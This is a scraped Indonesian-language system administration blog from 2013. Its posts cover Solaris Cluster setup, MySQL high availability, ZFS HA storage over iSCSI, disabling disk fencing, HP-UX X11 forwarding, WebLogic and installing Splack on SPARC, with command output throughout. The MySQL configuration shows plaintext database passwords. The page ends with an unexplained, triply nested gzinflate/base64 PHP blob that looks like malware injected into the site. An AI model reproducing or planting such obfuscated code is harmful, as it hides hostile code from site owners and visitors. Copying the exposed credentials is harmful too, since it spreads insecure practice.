      (MySQL-RG:MySQL-LH:NetIfList) Res property description: List of IPMP groups on each node
    (MySQL-RG:MySQL-LH:NetIfList) Res property pernode: False
      (MySQL-RG:MySQL-LH:NetIfList) Res property type: stringarray
      (MySQL-RG:MySQL-LH:NetIfList) Res property value: sc_ipmp0@1 sc_ipmp0@2 sc_ipmp0@3
 
# scrgadm -c -j MySQL-LH  -x netiflist=sc_ipmp0@1,sc_ipmp0@2

dari node yang aktif:

# clnode evacuate monyet3

shutdown monyet3 dan booting non cluster mode

ok boot -x

bersambung….



Monitoring MySQL Enterprise

  ozzie / 27/06/2013

MySQL HA – Solaris Cluster

  ozzie / 27/06/2013

build MySQL HA enterprise pada Solaris Cluster kandang-monyet & kandang-buaya…
karena Data Service MySQL belum include pada Solaris Cluster.. jadi registrasi manual..

  *** Data Services Menu ***
    Please select from one of the following options:
 
      * 1) Apache Web Server
      * 2) Oracle
      * 3) NFS
      * 4) Oracle Real Application Clusters
      * 5) PeopleSoft Enterprise Application Server
      * 6) Highly Available Storage
      * 7) Logical Hostname
      * 8) Shared Address
      * 9) Per Node Logical Hostname
      *10) Weblogic Server
 
      * ?) Help
      * q) Return to the Main Menu
    Option:

register Generic Data Service

# clresourcetype register  SUNW.gds SUNW.HAStoragePlus
# clresourcetype  show
=== Registered Resource Types ===   
....
....
Resource Type:                                  SUNW.gds:6
  RT_description:                                  Generic Data Service for Oracle Solaris Cluster
  RT_version:                                      6
  API_version:                                     2
  RT_basedir:                                      /opt/SUNWscgds/bin
  Single_instance:                                 False
  Proxy:                                           False
  Init_nodes:                                      All potential masters
  Installed_nodes:                                 <All>
  Failover:                                        False
  Pkglist:                                         <NULL>
  RT_system:                                       False
  Global_zone:                                     False
 
Resource Type:                                  SUNW.HAStoragePlus:10
  RT_description:                                  HA Storage Plus
  RT_version:                                      10
  API_version:                                     2
  RT_basedir:                                      /usr/cluster/lib/rgm/rt/hastorageplus
  Single_instance:                                 False
  Proxy:                                           False
  Init_nodes:                                      All potential masters
  Installed_nodes:                                 <All>
  Failover:                                        False
  Pkglist:                                         SUNWscu
  RT_system:                                       False
  Global_zone:                                     True
.....

Create resource group dan logical hostname untuk Failover

# clresourcegroup create MySQL-RG
# clresource create -g MySQL-RG -t SUNW.HAStoragePlus -p AffinityOn=TRUE -p Zpools=zMysql -p ZpoolsSearchDir=/dev/did/dsk MySQL-HAS
# clreslogicalhostname create -g MySQL-RG -h buaya  MySQL-LH 
# clresource list -v
Resource Name       Resource Type            Resource Group
-------------       -------------            --------------
MySQL-LH            SUNW.LogicalHostname:4   MySQL-RG
MySQL-HAS           SUNW.HAStoragePlus:10    MySQL-RG

Register Manual:
setting parameter sesuai konfigurasi & register…

# cp /opt/SUNWscmys/util/mysql_config /export/home/ozzie/mysql_config
# cp /opt/SUNWscmys/util/ha_mysql_config /export/home/ozzie/ha_mysql_config

mysql_config:

MYSQL_BASE=/opt/mysql/mysql
MYSQL_USER=root
MYSQL_PASSWD=baueek
MYSQL_HOST=Buaya
FMUSER=fmuser
FMPASS=fmuser
MYSQL_SOCK=/tmp/mysql.sock
MYSQL_NIC_HOSTNAME=Buaya
MYSQL_DATADIR=/global/mysql

ha_mysql_config:

 
RS=MySQL-RS
RG=MySQL-RG
PORT=3306
LH=buaya
SCALABLE=
LB_POLICY=
RS_PROP=
HAS_RS=MySQL-HAS
 
BASEDIR=/opt/mysql/mysql
DATADIR=/global/mysql
MYSQLUSER=mysql
MYSQLHOST=buaya
FMUSER=fmuser
FMPASS=fmuser
LOGDIR=/global/mysql/logs
CHECK=yes

register Data Service:

# /opt/SUNWscmys/util/mysql_register -f /export/home/ozzie/mysql_config  
# /opt/SUNWscmys/util/ha_mysql_register -f /export/home/ozzie/ha_mysql_config  
# clrs enable MySQL-RS

Taddaaaaa <:-p

bash-3.2# clrs status
 
=== Cluster Resources ===
 
Resource Name       Node Name      State        Status Message
-------------       ---------      -----        --------------
MySQL-RS            buaya2         Online       Online - Service is online.
                    buaya1         Offline      Offline
 
MySQL-LH            buaya2         Online       Online - LogicalHostname online.
                    buaya1         Offline      Offline
 
MySQL-HAS           buaya2         Online       Online
                    buaya1         Offline      Offline

tinggal switch antar node dah #:-s

# mysql -u root -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 84
Server version: 5.6.12-enterprise-commercial-advanced-log MySQL Enterprise Server - Advanced Edition (Commercial)
 
Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.
 
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
 
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
 
mysql>



Shutdown semua node.

root@Monyet3:~# scshutdown 
Broadcast Message from root (???) on Monyet3 Mon Jun 24 02:42:38...
 The cluster kandang-monyet will be shutdown in  1 minute
 
Broadcast Message from root (???) on Monyet3 Mon Jun 24 02:43:08...
 The cluster kandang-monyet will be shutdown in  30 seconds
 
Do you want to continue? (y or n):   y

Berhubung mesin SPARC tinggal tambah option di OKpromt..

SPARC Enterprise T5220, No Keyboard
Copyright (c) 1998, 2012, Oracle and/or its affiliates. All rights reserved.
OpenBoot 4.33.6.b, 4096 MB memory available, Serial #83382360.
Ethernet address 0:14:4f:f8:50:58, Host ID: 84f85058.
 
 
 
{0} ok boot -x
Boot device: /virtual-devices@100/channel-devices@200/disk@0:a  File and args: -x
SunOS Release 5.11 Version 11.1 64-bit
Copyright (c) 1983, 2012, Oracle and/or its affiliates. All rights reserved.
\

tinggal execute clsetup

  *** Main Menu ***
 
    Select from one of the following options:
 
        1) Change Network Addressing and Ranges for the Cluster Transport
        2) Show Network Addressing and Ranges for the Cluster Transport
 
        ?) Help with menu options
        q) Quit
 
    Option:

  >>> Change Network Addressing and Ranges for the Cluster Transport <<<
 
    Network addressing for the cluster transport is currently configured 
    as follows:
 
 
=== Private Network ===                        
 
private_netaddr:                                172.16.0.0
  private_netmask:                                 255.255.240.0
  max_nodes:                                       62
  max_privatenets:                                 10
  num_zoneclusters:                                12
  num_xip_zoneclusters:                            3
 
    Do you want to change this configuration (yes/no) [yes]?  
 
    The default network address for the cluster transport is 172.16.0.0.
 
    Do you want to use the default (yes/no) [yes]?  no
 
    What network address do you want to use?  172.16.202.0
 
    The combination of private netmask and network address will dictate 
    both the maximum number of nodes and private networks that can be 
    supported by a cluster. Given your private network address, this 
    program will generate a range of recommended private netmasks based on
    the maximum number of nodes and private networks that you anticipate 
    for this cluster.
 
    In specifying the anticipated number of maximum nodes and private 
    networks for this cluster, it is important that you give serious 
    consideration to future growth potential. While both the private 
    netmask and network address can be changed later, the tools for making
    such changes require that all nodes in the cluster be booted into 
    noncluster mode.
 
    Maximum number of nodes anticipated for future growth [3]?  
    Maximum number of private networks anticipated for future growth [2]?  
 
    Specify a netmask of 255.255.254.0 to meet anticipated future 
    requirements of 3 cluster nodes and 2 private networks.
 
    To accommodate more growth, specify a netmask of 255.255.254.0 to 
    support up to 6 cluster nodes and 4 private networks.
 
    What netmask do you want to use [255.255.254.0]?  
 
    Is it okay to proceed with the update (yes/no) [yes]?  
 
/usr/cluster/bin/cluster set-netprops -p private_netaddr=172.16.202.0 -p private_netmask=255.255.254.0 -p max_nodes=3 -p max_privatenets=2
Attempting to contact node "Monyet3" ...done
Attempting to contact node "Monyet2" ...done
 
    Command completed successfully.

tinggal reboot dan taadddaaaaa.. 8-}

root@Monyet1:~# clinterconnect show
 
=== Transport Cables ===                       
 
Transport Cable:                                Monyet3:net0,switch1@1
  Endpoint1:                                       Monyet3:net0
  Endpoint2:                                       switch1@1
  State:                                           Enabled
 
Transport Cable:                                Monyet3:net2,switch2@1
  Endpoint1:                                       Monyet3:net2
  Endpoint2:                                       switch2@1
  State:                                           Enabled
 
Transport Cable:                                Monyet2:net0,switch1@2
  Endpoint1:                                       Monyet2:net0
  Endpoint2:                                       switch1@2
  State:                                           Enabled
 
Transport Cable:                                Monyet2:net2,switch2@2
  Endpoint1:                                       Monyet2:net2
  Endpoint2:                                       switch2@2
  State:                                           Enabled
 
Transport Cable:                                Monyet1:net0,switch1@3
  Endpoint1:                                       Monyet1:net0
  Endpoint2:                                       switch1@3
  State:                                           Enabled
 
Transport Cable:                                Monyet1:net2,switch2@3
  Endpoint1:                                       Monyet1:net2
  Endpoint2:                                       switch2@3
  State:                                           Enabled
 
 
=== Transport Switches ===                     
 
Transport Switch:                               switch1
  State:                                           Enabled
  Type:                                            switch
  Port Names:                                      1 2 3
  Port State(1):                                   Enabled
  Port State(2):                                   Enabled
  Port State(3):                                   Enabled
 
Transport Switch:                               switch2
  State:                                           Enabled
  Type:                                            switch
  Port Names:                                      1 2 3
  Port State(1):                                   Enabled
  Port State(2):                                   Enabled
  Port State(3):                                   Enabled
 
 
--- Transport Adapters for Monyet3 ---         
 
Transport Adapter:                              net0
  State:                                           Enabled
  Transport Type:                                  dlpi
  device_name:                                     net
  device_instance:                                 0
  lazy_free:                                       1
  dlpi_heartbeat_timeout:                          10000
  dlpi_heartbeat_quantum:                          1000
  nw_bandwidth:                                    80
  bandwidth:                                       70
  ip_address:                                      172.16.202.17
  netmask:                                         255.255.255.248
  Port Names:                                      0
  Port State(0):                                   Enabled
 
Transport Adapter:                              net2
  State:                                           Enabled
  Transport Type:                                  dlpi
  device_name:                                     net
  device_instance:                                 2
  lazy_free:                                       1
  dlpi_heartbeat_timeout:                          10000
  dlpi_heartbeat_quantum:                          1000
  nw_bandwidth:                                    80
  bandwidth:                                       70
  ip_address:                                      172.16.202.9
  netmask:                                         255.255.255.248
  Port Names:                                      0
  Port State(0):                                   Enabled
 
 
--- Transport Adapters for Monyet2 ---         
 
Transport Adapter:                              net0
  State:                                           Enabled
  Transport Type:                                  dlpi
  device_name:                                     net
  device_instance:                                 0
  lazy_free:                                       1
  dlpi_heartbeat_timeout:                          10000
  dlpi_heartbeat_quantum:                          1000
  nw_bandwidth:                                    80
  bandwidth:                                       70
  ip_address:                                      172.16.202.18
  netmask:                                         255.255.255.248
  Port Names:                                      0
  Port State(0):                                   Enabled
 
Transport Adapter:                              net2
  State:                                           Enabled
  Transport Type:                                  dlpi
  device_name:                                     net
  device_instance:                                 2
  lazy_free:                                       1
  dlpi_heartbeat_timeout:                          10000
  dlpi_heartbeat_quantum:                          1000
  nw_bandwidth:                                    80
  bandwidth:                                       70
  ip_address:                                      172.16.202.10
  netmask:                                         255.255.255.248
  Port Names:                                      0
  Port State(0):                                   Enabled
 
 
--- Transport Adapters for Monyet1 ---         
 
Transport Adapter:                              net0
  State:                                           Enabled
  Transport Type:                                  dlpi
  device_name:                                     net
  device_instance:                                 0
  lazy_free:                                       1
  dlpi_heartbeat_timeout:                          10000
  dlpi_heartbeat_quantum:                          1000
  nw_bandwidth:                                    80
  bandwidth:                                       70
  ip_address:                                      172.16.202.19
  netmask:                                         255.255.255.248
  Port Names:                                      0
  Port State(0):                                   Enabled
 
Transport Adapter:                              net2
  State:                                           Enabled
  Transport Type:                                  dlpi
  device_name:                                     net
  device_instance:                                 2
  lazy_free:                                       1
  dlpi_heartbeat_timeout:                          10000
  dlpi_heartbeat_quantum:                          1000
  nw_bandwidth:                                    80
  bandwidth:                                       70
  ip_address:                                      172.16.202.11
  netmask:                                         255.255.255.248
  Port Names:                                      0
  Port State(0):                                   Enabled


HA storage ZFS

  ozzie / 23/06/2013

simulasi High-Availability Storage dengan 3 node Solaris Cluster dan iSCSI dengan Solaris 11 & Solaris Cluster 4.1.


setelah Solaris Cluster sudah up..

root@Monyet1:~# cluster show -t global
=== Cluster ===                                
Cluster Name:                                   kandang-monyet
  clusterid:                                       0x51C6CA70
  installmode:                                     disabled
  heartbeat_timeout:                               10000
  heartbeat_quantum:                               1000
  private_netaddr:                                 172.16.0.0
  private_netmask:                                 255.255.240.0
  max_nodes:                                       62
  max_privatenets:                                 10
  num_zoneclusters:                                12
  num_xip_zoneclusters:                            3
  udp_session_timeout:                             480
  concentrate_load:                                False
  resource_security:                               SECURE
  global_fencing:                                  prefer3
  Node List:                                       Monyet3, Monyet2, Monyet1
 
root@Monyet1:~# clnode status
=== Cluster Nodes ===
--- Node Status ---
 
Node Name                                       Status
---------                                       ------
Monyet3                                         Online
Monyet2                                         Online
Monyet1                                         Online

Add quorum disk device

root@Monyet1:~# cldevice status
=== Cluster DID Devices ===
Device Instance              Node               Status
---------------              ----               ------
/dev/did/rdsk/d1             Monyet3            Unmonitored
 
/dev/did/rdsk/d2             Monyet1            Ok
                             Monyet2            Ok
                             Monyet3            Ok
 
/dev/did/rdsk/d3             Monyet2            Unmonitored
 
/dev/did/rdsk/d5             Monyet1            Unmonitored

Enable automatic node reboot if all monitored disk fail:

root@Monyet1:~# clnode set -p reboot_on_path_failure=enabled +
 
root@Monyet1:~# clnode show
 
=== Cluster Nodes ===                          
 
Node Name:                                      Monyet3
  Node ID:                                         1
  Enabled:                                         yes
  privatehostname:                                 clusternode1-priv
  reboot_on_path_failure:                          enabled
  globalzoneshares:                                1
  defaultpsetmin:                                  1
  quorum_vote:                                     1
  quorum_defaultvote:                              1
  quorum_resv_key:                                 0x51C6CA7000000001
  Transport Adapter List:                          net0, net2
 
Node Name:                                      Monyet2
  Node ID:                                         2
  Enabled:                                         yes
  privatehostname:                                 clusternode2-priv
  reboot_on_path_failure:                          enabled
  globalzoneshares:                                1
  defaultpsetmin:                                  1
  quorum_vote:                                     1
  quorum_defaultvote:                              1
  quorum_resv_key:                                 0x51C6CA7000000002
  Transport Adapter List:                          net0, net2
 
Node Name:                                      Monyet1
  Node ID:                                         3
  Enabled:                                         yes
  privatehostname:                                 clusternode3-priv
  reboot_on_path_failure:                          enabled
  globalzoneshares:                                1
  defaultpsetmin:                                  1
  quorum_vote:                                     1
  quorum_defaultvote:                              1
  quorum_resv_key:                                 0x51C6CA7000000003
  Transport Adapter List:                          net0, net2

Registering the cluster storage & Network service

root@Monyet1:~# clresourcetype register SUNW.gds SUNW.HAStoragePlus



Create Resource Group dari group Monyet

root@Monyet1:~# clresourcegroup create -n Monyet1,Monyet2,Monyet3 RG-MONYET
root@Monyet1:~# clresourcegroup status
 
=== Cluster Resource Groups ===
 
Group Name       Node Name       Suspended      Status
----------       ---------       ---------      ------
RG-MONYET        Monyet1         No             Unmanaged
                 Monyet2         No             Unmanaged
                 Monyet3         No             Unmanaged
 
root@Monyet1:~# clresourcegroup manage RG-MONYET
root@Monyet1:~# clresourcegroup status
 
=== Cluster Resource Groups ===
 
Group Name       Node Name       Suspended      Status
----------       ---------       ---------      ------
RG-MONYET        Monyet1         No             Offline
                 Monyet2         No             Offline
                 Monyet3         No             Offline



Create ZFS pool isi pelem – ‘poolBOKEP’ – sebelom tambah ke resource cluster

root@Monyet1:~# echo | format
Searching for disks...done
AVAILABLE DISK SELECTIONS:
       0. c2d0 <SUN-Disk-40GB cyl 1135 alt 2 hd 96 sec 768>
          /virtual-devices@100/channel-devices@200/disk@0
       1. c3t0d0 <iSCSI Disk-0123 cyl 19455 alt 2 hd 255 sec 63>
          /iscsi/disk@0000iqn.2013-03.org.kebonbinatang.storage1%3Adisk00001,0
Specify disk (enter its number): Specify disk (enter its number): 
 
root@Monyet1:~# zpool  create poolBOKEP c3t0d0
root@Monyet1:~# zpool export poolBOKEP



tambah ‘poolBOKEP’ sebagai resource group RG-MONYET:

root@Monyet1:~# clresource create -g RG-MONYET -t SUNW.HAStoragePlus -p AffinityOn=TRUE -p  Zpools=poolBOKEP  -p \ ZpoolsSearchDir=/dev/did/dsk RS-BOKEP-HAS
root@Monyet1:~# clresource list
RS-BOKEP-HAS
root@Monyet1:~# clresource show
=== Resources ===                              
 
Resource:                                       RS-BOKEP-HAS
  Type:                                            SUNW.HAStoragePlus:10
  Type_version:                                    10
  Group:                                           RG-MONYET
  R_description:                                   
  Resource_project_name:                           default
  Enabled{Monyet1}:                                True
  Enabled{Monyet2}:                                True
  Enabled{Monyet3}:                                True
  Monitored{Monyet1}:                              True
  Monitored{Monyet2}:                              True
  Monitored{Monyet3}:                              True

Import poolBokep tadi:

root@Monyet1:~#  zpool import poolBOKEP

tambah Virtual IP resource untuk resource group RG-MONYET :

root@Monyet1:~# clreslogicalhostname create -g RG-MONYET -h Monyet -N  \
sc_ipmp0@Monyet1,sc_ipmp0@Monyet2,sc_ipmp0@Monyet3 RS-MONYET
 
root@Monyet1:~# clresource list
RS-MONYET
RS-BOKEP-HAS
root@Monyet1:~# clresource show
 
=== Resources ===                              
 
Resource:                                       RS-BOKEP-HAS
  Type:                                            SUNW.HAStoragePlus:10
  Type_version:                                    10
  Group:                                           RG-MONYET
  R_description:                                   
  Resource_project_name:                           default
  Enabled{Monyet1}:                                True
  Enabled{Monyet2}:                                True
  Enabled{Monyet3}:                                True
  Monitored{Monyet1}:                              True
  Monitored{Monyet2}:                              True
  Monitored{Monyet3}:                              True
 
Resource:                                       RS-MONYET
  Type:                                            SUNW.LogicalHostname:4
  Type_version:                                    4
  Group:                                           RG-MONYET
  R_description:                                   
  Resource_project_name:                           default
  Enabled{Monyet1}:                                True
  Enabled{Monyet2}:                                True
  Enabled{Monyet3}:                                True
  Monitored{Monyet1}:                              True
  Monitored{Monyet2}:                              True
  Monitored{Monyet3}:                              True

sampai sini tinggal pindah2 resource group ke Monyet-Monyet yg laen ;)) [failover]

root@Monyet1:~# clresourcegroup switch -n Monyet3 RG-MONYET

atau mau di balikin ulang :-??

root@Monyet1:~#  clresourcegroup remaster RG-MONYET

tinggal isi pelem di poolBOKEP dah \:d/

root@Monyet3:~# scstat 
------------------------------------------------------------------
 
-- Cluster Nodes --
 
                    Node name           Status
                    ---------           ------
  Cluster node:     Monyet3             Online
  Cluster node:     Monyet2             Online
  Cluster node:     Monyet1             Online
 
------------------------------------------------------------------
 
-- Cluster Transport Paths --
 
                    Endpoint               Endpoint               Status
                    --------               --------               ------
  Transport path:   Monyet3:net2           Monyet2:net2           Path online
  Transport path:   Monyet3:net0           Monyet2:net0           Path online
  Transport path:   Monyet3:net2           Monyet1:net2           Path online
  Transport path:   Monyet3:net0           Monyet1:net0           Path online
  Transport path:   Monyet2:net2           Monyet1:net2           Path online
  Transport path:   Monyet2:net0           Monyet1:net0           Path online
 
------------------------------------------------------------------
 
-- Quorum Summary from latest node reconfiguration --
 
  Quorum votes possible:      5
  Quorum votes needed:        3
  Quorum votes present:       5
 
 
-- Quorum Votes by Node (current status) --
 
                    Node Name           Present Possible Status
                    ---------           ------- -------- ------
  Node votes:       Monyet3             1        1       Online
  Node votes:       Monyet2             1        1       Online
  Node votes:       Monyet1             1        1       Online
 
 
-- Quorum Votes by Device (current status) --
 
                    Device Name         Present Possible Status
                    -----------         ------- -------- ------
  Device votes:     /dev/did/rdsk/d2s2  2        2       Online
 
------------------------------------------------------------------
 
-- Device Group Servers --
 
                         Device Group        Primary             Secondary
                         ------------        -------             ---------
 
 
-- Device Group Status --
 
                              Device Group        Status              
                              ------------        ------              
 
 
-- Multi-owner Device Groups --
 
                              Device Group        Online Status
                              ------------        -------------
 
------------------------------------------------------------------
 
-- Resource Groups and Resources --
 
            Group Name     Resources
            ----------     ---------
 Resources: RG-MONYET      RS-BOKEP-HAS RS-MONYET
 
 
-- Resource Groups --
 
            Group Name     Node Name                State          Suspended
            ----------     ---------                -----          ---------
     Group: RG-MONYET      Monyet1                  Offline        No
     Group: RG-MONYET      Monyet2                  Online         No
     Group: RG-MONYET      Monyet3                  Offline        No
 
 
-- Resources --
 
            Resource Name  Node Name                State          Status Message
            -------------  ---------                -----          --------------
  Resource: RS-BOKEP-HAS   Monyet1                  Offline        Offline
  Resource: RS-BOKEP-HAS   Monyet2                  Online         Online
  Resource: RS-BOKEP-HAS   Monyet3                  Offline        Offline
 
  Resource: RS-MONYET      Monyet1                  Offline        Offline - LogicalHostname offline.
  Resource: RS-MONYET      Monyet2                  Online         Online - LogicalHostname online.
  Resource: RS-MONYET      Monyet3                  Offline        Offline
 
------------------------------------------------------------------
 
-- IPMP Groups --
 
              Node Name           Group   Status         Adapter   Status
              ---------           -----   ------         -------   ------
  IPMP Group: Monyet3             sc_ipmp0 Online         net1      Online
 
  IPMP Group: Monyet2             sc_ipmp0 Online         net1      Online
 
  IPMP Group: Monyet1             sc_ipmp0 Online         net1      Online
 
------------------------------------------------------------------


Disable fencing device shared-storage

  ozzie / 23/06/2013

berhubung pakai iSCSI untuk share-storage ke semua buaya ;))

# echo | format
Searching for disks...done
 
AVAILABLE DISK SELECTIONS:
       0. c1t0d0 <HITACHI-H103014SCSUN146G-A160-136.73GB>
          /pci@0/pci@0/pci@2/scsi@0/sd@0,0
       1. c2t2d0 <iSCSIDisk-0123 cyl 6524 alt 2 hd 255 sec 63>
          /iscsi/disk@0000iqn.2011-03.org.kebonbinatang.storage2%3Adisk20001,0
       2. c2t3d0 <iSCSIDisk-0123 cyl 6524 alt 2 hd 255 sec 63>
          /iscsi/disk@0000iqn.2011-03.org.kebonbinatang.storage2%3Adisk20001,1
Specify disk (enter its number): Specify disk (enter its number):

# clq show
 
=== Cluster Nodes ===                          
 
Node Name:                                      Buaya1
  Node ID:                                         1
  Quorum Vote Count:                               1
  Reservation Key:                                 0x51C625D900000001
 
Node Name:                                      Buaya2
  Node ID:                                         2
  Quorum Vote Count:                               1
  Reservation Key:                                 0x51C625D900000002
 
 
=== Quorum Devices ===                         
 
Quorum Device Name:                             d2
  Enabled:                                         yes
  Votes:                                           1
  Global Name:                                     /dev/did/rdsk/d2s2
  Type:                                            shared_disk
  Access Mode:                                     scsi2
  Hosts (enabled):                                 Buaya1, Buaya2

cldevice show       
 
=== DID Device Instances ===                   
 
DID Device Name:                                /dev/did/rdsk/d1
  Full Device Path:                                Buaya2:/dev/rdsk/c2t3d0
  Full Device Path:                                Buaya1:/dev/rdsk/c2t3d0
  Replication:                                     none
  default_fencing:                                 global
 
DID Device Name:                                /dev/did/rdsk/d2
  Full Device Path:                                Buaya1:/dev/rdsk/c2t2d0
  Full Device Path:                                Buaya2:/dev/rdsk/c2t2d0
  Replication:                                     none
  default_fencing:                                 global
 
DID Device Name:                                /dev/did/rdsk/d3
  Full Device Path:                                Buaya1:/dev/rdsk/c1t0d0
  Replication:                                     none
  default_fencing:                                 global
 
DID Device Name:                                /dev/did/rdsk/d4
  Full Device Path:                                Buaya2:/dev/rdsk/c1t0d0
  Replication:                                     none
  default_fencing:                                 global



disable device d2 yg shared tadi

# cldevice set  -p default_fencing=nofencing-noscrub d2
#
# cldevice show       
 
=== DID Device Instances ===                   
.....
.....
DID Device Name:                                /dev/did/rdsk/d2
  Full Device Path:                                Buaya1:/dev/rdsk/c2t2d0
  Full Device Path:                                Buaya2:/dev/rdsk/c2t2d0
  Replication:                                     none
  default_fencing:                                 nofencing
 
.....
.....


ssh X-Forward – HPUX

  ozzie / 16/06/2013

just reminder :D

ketika konfigurasi X-Forwarding ssh di mesin HP-UX udah fix.. tapi muncul error :
Error: Can’t open display:
Error: Couldn’t find per display information

sedangkan / seumpama / andaikata pengen running aplikasi yg perlu GUI.. #:-s

 

# echo "hosts: files dns" > /etc/nsswitch.conf

sepele sihh… 8-} tapi daripada panik? =))



Pre-Requisites:

  • Oracle Database 11g
  • Oracle Business Intelligence
  • Repository Creation Utility (RCU) tools
  • nls_length_semantics parameter pada database harus di set BYTE (CHAR not supported)
  • UTF-8
  • enable X Forwarding via SSH
    edit /etc/ssh/sshd_config

    # X11 tunneling options
    X11Forwarding yes


     

     

     

     

     

     

     

    default Oracle Business Intelligence URL:

    Component Default URL Port
    Oracle BI Presentation Services http://host:9704/analytics 9704
    WebLogic Console http://host:7001/console 7001
    Enterprise Manager http://host:7001/em 7001
    Business Intelligence Publisher http://host:9704/xmlpserver 9704
    Real-Time Decisions http://host:9704/ui 9704

    bersambung..



Installing Oracle VM Manager

  ozzie / 23/05/2013

Oracle VM Manager dengan base OS menggunakan Oracle Linux 6.x. install OS seperti biasa..

Minimum spec prerequisite OVM:

  • – Memory: 1.5 GB (4GB jika pakai Oracle DataBase XE)
  • – Processor: 64 bit
  • – Swap: > 2.1 GB
  • – Disk Space: 5 GB untuk /u01 dan 2 GB /tmp

 

semua source dapat di download di: https://edelivery.oracle.com/
untuk update packages Oracle Linux via yum (bisa baca disini

berikut list kebutuhan port untuk komunikasi OVM – OVS – Client



Oracle Enterprise Cloud Infrastucture

  ozzie / 23/04/2013

Exploring & Build Cloud & Solaris Virtualization (LDOMs & Zone).



just review: Oracle Enterprise Manager Ops Center. semua fitur; monitoring, provisioning, managing, maintaining.. hingga developing pun sudah include development plan… Migrate zone & vm.. server & storage pool..


Enterprise Manager Ops Center 12c & Enterprise Manager Cloud Control 12c



Oracle WebLogic

  ozzie / 21/04/2013

*Just Reminder
kadang install liwat GUI configure domain via quickstart.sh #:-s

kalo mesin-mesin SOLARIS non GUI:

# {WLS_HOME}/common/bin/config.sh -mode=console

oiyah #-o..
untuk solaris 11 harus install jdk, (default nya gak ada javac)

#  pkg  install --accept pkg:/developer/java/jdk@1.7.0.7-0.175.1.0.0.24.0


splack [slackware @ SPARC]

  ozzie / 10/04/2013

install splack @ SPARC Architecture:

berhubung running di LDoms nya solaris. tinggal alokasi resource seperlunya :D

[    0.000000] PROMLIB: Sun IEEE Boot Prom 'OBP 4.33.6.b 2012/12/11 20:50'
[    0.000000] PROMLIB: Root node compatible: sun4v
[    0.000000] Linux version 2.6.23.17-gl64090105 (root@toad) (gcc version 4.2.3) #2 SMP Tue Jan 6 04:22:34 Local time zone must be set--see zic m
[    0.000000] ARCH: SUN4V
[    0.000000] Ethernet address: 00:14:4f:fb:fa:64
[    0.000000] OF stdout device is: /virtual-devices@100/console@1
[    0.000000] PROM: Built device tree with 35549 bytes of memory.
[    0.000000] MDESC: Size is 19680 bytes.
[    0.000000] PLATFORM: banner-name [SPARC Enterprise T5220]
[    0.000000] PLATFORM: name [SUNW,SPARC-Enterprise-T5220]
[    0.000000] PLATFORM: hostid [84fbfa64]
[    0.000000] PLATFORM: serial# [00ab4130]
[    0.000000] PLATFORM: stick-frequency [5458c3a0]
[    0.000000] PLATFORM: mac-address [144ffbfa64]
[    0.000000] PLATFORM: watchdog-resolution [1000 ms]
[    0.000000] PLATFORM: watchdog-max-timeout [31536000000 ms]
[    0.000000] PLATFORM: max-cpus [64]
[    0.000000] On node 0 totalpages: 1046987
[    0.000000]   Normal zone: 7278 pages used for memmap
[    0.000000]   Normal zone: 0 pages reserved
[    0.000000]   Normal zone: 1039709 pages, LIFO batch:15
[    0.000000]   Movable zone: 0 pages used for memmap
[    0.000000] Built 1 zonelists in Zone order.  Total pages: 1039709
...
...
...
 
 
Welcome to the Splack Linux installation disk! (version 12.1-pre1)
 
######  IMPORTANT!  READ THE INFORMATION BELOW CAREFULLY.  ######
 
- You will need one or more partitions of type 'Linux' prepared.  It is also
  recommended that you create a swap partition (type 'Linux swap') prior
  to installation.  For more information, run 'setup' and read the help file.
 
- If you're having problems that you think might be related to low memory (this
  is possible on machines with 64 or less megabytes of system memory), you can
  try activating a swap partition before you run setup.  After making a swap
  partition (type 82) with cfdisk or fdisk, activate it like this: 
    mkswap /dev/<partition> ; swapon /dev/<partition>
 
- Once you have prepared the disk partitions for Linux, type 'setup' to begin
  the installation process.  
 
- If you do not have a color monitor, type:  TERM=vt100
  before you start 'setup'.
 
You may now login as 'root'.
 
slackware login: 
 
Linux 2.6.23.17-gl64090105.
 
If you're upgrading an existing Slackware system, you might want to
remove old packages before you run 'setup' to install the new ones. If
you don't, your system will still work but there might be some old files
left laying around on your drive.
 
Just mount your Linux partitions under /mnt and type 'pkgtool'. If you
don't know how to mount your partitions, type 'pkgtool' and it will tell
you how it's done.
 
To partition your hard drive(s), use 'cfdisk' or 'fdisk'.
To activate PCMCIA/Cardbus devices needed for installation, type 'pcmcia'.
To start the main installation, type 'setup'.
 
root@slackware:/#


".gzinflate(base64_decode(gzinflate(base64_decode(gzinflate(base64_decode('BcHRdkMwAADQD/KgS0mzR8ShjSMJNWveEEamOGljab9+9+KOSbyef5IA89DREZ+phxlyKhQ2sF/pt2hxFtPHwFYI4J1+mVr7YRsVICLl0fQMYyzzvW8FIOGbX1PVUVAP0/uWuZs8RWoEcMl8XpKEe37FrPxw/eeNGNw19npJt8S5uOlh83I2wUDpI6btM7hPv0s8Idtwt7XVp6gqMz92VSRz6Zx7WFuuSb8YAk8IveQfQ69xi7kGBRCNSsZSDPl+CP4B'))))))); ?>